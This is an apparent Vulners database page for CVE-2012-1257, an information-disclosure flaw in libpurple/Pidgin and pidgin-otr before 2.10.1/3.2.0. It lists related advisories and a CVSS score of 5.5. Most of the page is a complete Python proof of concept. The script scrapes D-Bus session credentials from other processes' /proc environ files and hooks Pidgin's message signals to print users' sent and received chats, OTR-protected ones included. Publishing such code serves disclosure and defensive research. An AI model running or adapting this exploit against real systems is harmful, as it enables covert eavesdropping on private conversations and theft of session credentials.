Vulners
Lucene search
libpurple 2.8.10 - OTR Information Disclosure
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2012-1257 | 25 Feb 201200:00 | – | circl |
 | CVE-2012-1257 | 20 Nov 201919:31 | – | cve |
 | CVE-2012-1257 | 20 Nov 201919:31 | – | cvelist |
 | CVE-2012-1257 | 20 Nov 201919:31 | – | debiancve |
 | EUVD-2012-1283 | 7 Oct 202500:30 | – | euvd |
 | libpurple 2.8.10 - OTR Information Disclosure | 25 Feb 201200:00 | – | exploitpack |
 | CVE-2012-1257 | 20 Nov 201920:15 | – | nvd |
 | DEBIAN-CVE-2012-1257 | 20 Nov 201920:15 | – | osv |
| UBUNTU-CVE-2012-1257 | 20 Nov 201920:15 | – | osv |
 | Information disclosure | 20 Nov 201920:15 | – | prion |
10
source: https://www.securityfocus.com/bid/52175/info
libpurple is prone to an information-disclosure vulnerability.
Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks.
The following products are vulnerable:
libpurple versions prior to 2.10.1
pidgin versions prior to 2.10.1
pidgin-otr versions prior to 3.2.0
#!/usr/bin/env python
# PoC for snooping on pidgin discussions (OTR/non-OTR) via dbus
# (see CVE-2012-1257)
#
# requires python-dbus and python-gobject
#
# based on sample code found here:
# http://developer.pidgin.im/wiki/DbusHowto
#
# Disclaimer: There's virtually no error handling here,
# so don't rely on this for any serious work.
#
# Author:
# Dimitris Glynos :: { dimitris at census dash labs dot com }
import dbus, gobject, os, sys
from dbus.mainloop.glib import DBusGMainLoop
# same owner processes get to snoop their respective DBUS credentials
# via /proc/<pid>/environ
def obtain_dbus_session_creds():
all_pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
env_tmpl = '/proc/%s/environ'
session_creds = {}
for pid in all_pids:
if not (os.stat(env_tmpl % pid).st_uid == os.getuid()):
continue
if not os.access(env_tmpl % pid, os.R_OK):
continue
f = open(env_tmpl % pid, 'rb')
contents = f.read()
f.close()
for var in contents.split('\0'):
if var.startswith('DBUS_SESSION_BUS_ADDRESS='):
val = var[var.index('=')+1:]
if not session_creds.has_key(val):
session_creds[val] = 1
return session_creds
def recvs(account, contact, msg, conversation, flags):
print "received '%s' from %s" % (msg, contact)
def sends(account, contact, msg, conversation, flags):
if flags == 1:
print "sent '%s' to %s" % (msg, contact)
if not os.environ.has_key('DBUS_SESSION_BUS_ADDRESS'):
creds = obtain_dbus_session_creds()
if len(creds.keys()) == 0:
print >> sys.stderr, ( "error: no dbus session " +
"credentials could be recovered." )
sys.exit(1)
if len(creds.keys()) > 1:
print >> sys.stderr, ( "error: multiple dbus session " +
"credentials found!\nPlease rerun with the proper "+
"DBUS_SESSION_BUS_ADDRESS env variable\n" +
"Here are the recovered credentials:\n")
for k in creds.keys():
print >> sys.stderr, "DBUS_SESSION_BUS_ADDRESS=%s" % k
sys.exit(1)
os.environ["DBUS_SESSION_BUS_ADDRESS"] = creds.keys()[0]
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SessionBus()
bus.add_signal_receiver(
recvs,
dbus_interface="im.pidgin.purple.PurpleInterface",
signal_name="ReceivedImMsg"
)
bus.add_signal_receiver(
sends,
dbus_interface="im.pidgin.purple.PurpleInterface",
signal_name="WroteImMsg"
)
mainloop = gobject.MainLoop()
mainloop.run()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Feb 2012 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 22.1
CVSS 3.15.5
EPSS0.00243